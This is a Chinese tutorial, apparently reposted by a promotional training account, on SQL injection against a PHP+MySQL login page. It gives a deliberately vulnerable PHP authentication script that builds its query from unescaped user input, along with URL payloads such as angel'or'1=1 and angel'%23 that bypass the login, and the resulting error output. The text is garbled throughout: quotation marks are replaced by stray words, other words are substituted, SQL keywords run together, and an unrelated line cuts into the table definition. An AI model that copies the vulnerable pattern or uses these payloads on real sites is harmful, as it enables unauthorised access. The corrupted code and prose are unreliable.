家如何学习布局有效的SQL语句。

我们拿一个用户验证的例子,首先建立一个数据库和一个数据表并插入一条记录,如下:

CREATETABLE`user`(

php注入原理给年夜家懂得一下PHP下的注入的特别性和道理 Node.js

`userid`int(11)NOTNULLauto_increment,

`username`varchar(20)NOTNULLdefault'',

`password`varchar(20)NOTNULLdefault'',

PRIMARYKEY(`userid`)

)TYPE=MyISAMAUTO_INCREMENT=3;

#

#导出表中的数据`user`

#

INSERTINTO`user`VALUES(1,'angel','mypass');

验证用户文件的代码如下:

<?php

$servername=\"大众localhost\公众;

$dbusername=\"大众root\"大众;

$dbpassword=\公众\"大众;

$dbname=\"大众injection\"大众;

mysql_connect($servername,$dbusername,$dbpassword)ordie(\"大众数据库连接失落败\公众);

$sql=\"大众SELECTFROMuserWHEREusername='$username'ANDpassword='$password'\"大众;

$result=mysql_db_query($dbname,$sql);

$userinfo=mysql_fetch_array($result);

if(empty($userinfo))

{

echo\"大众上岸失落败\公众;

}else{

echo\"大众上岸成功\"大众;

}

echo\"大众

SQLQuerysql

\公众;

?&gt;

这时我们提交

http://127.0.0.1/injection/user.php?username=angel'or1=1

就会返回:

Warning:mysql_fetch_array():suppliedargumentisnotavalidMySQLresultresource

inF:wwwinjectionuser.phponline13

上岸失落败

SQLQuery:SELECTFROMuserWHEREusername='angel'or1=1'ANDpassword=''

PHPWarning:mysql_fetch_array():suppliedargumentisnotavalidMySQLresult

resourceinF:wwwinjectionuser.phponline13

看到了吗?单引号闭合后,并没有注释掉后面的单引号,导致单引号没有精确配对,以是由

此可知我们布局的语句不能让Mysql精确实行,要重新布局:

http://127.0.0.1/injection/user.php?username=angel'or'1=1

这时显示\"大众上岸成功\"大众,解释成功了。
或者提交:

http://127.0.0.1/injection/user.php?username=angel'/

http://127.0.0.1/injection/user.php?username=angel'%23

这样就把后面的语句给注释掉了!
说说这两种提交的不同之处,我们提交的第一句是利用逻

辑运算,在ASP中利用可以说是非常广泛的,这个不用说了吧?第二、三句是根据mysql的特性,mysql支持/和#两种注释格式,以是我们提交的时候是把后面的代码注释掉,值得把稳的是由于编码问题,在IE地址栏里提交#会变成空的,以是我们在地址栏提交的时候,该当提交%23,才会变成#,就成功注释了,这个比逻辑运算大略得多了,由此可以看出PHP比ASP强大灵巧多了。

通过上面的例子大家该当对PHP+MYSQL的注入有个感性的认识了吧?

弈安传媒科技微教室,每天分享财经资讯,打算机技能知识,人生感悟,创业辅导以及各种专业技能知识资料学习互换.移动学习平台、知识分享平台。
随时随地的学习,如果你喜好发展,这里你不容错过的地方.弈安传媒科技培训关注:关注自己发展,分享内容,分享自己的技能,造诣未来.

[弈安传媒科技提升自己的平台]请关注:头条号及公众年夜众号 弈安传媒科技